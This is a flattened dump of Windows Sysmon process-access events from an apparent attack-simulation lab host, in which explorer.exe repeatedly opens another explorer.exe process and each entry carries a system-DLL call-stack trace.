16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.644{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.644{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.644{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.644{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.644{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.644{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.644{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.644{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.644{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.643{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.643{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.643{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.643{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.643{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.643{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.643{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.643{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.643{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.642{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.642{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.642{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.642{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.642{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.641{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.642{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.641{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 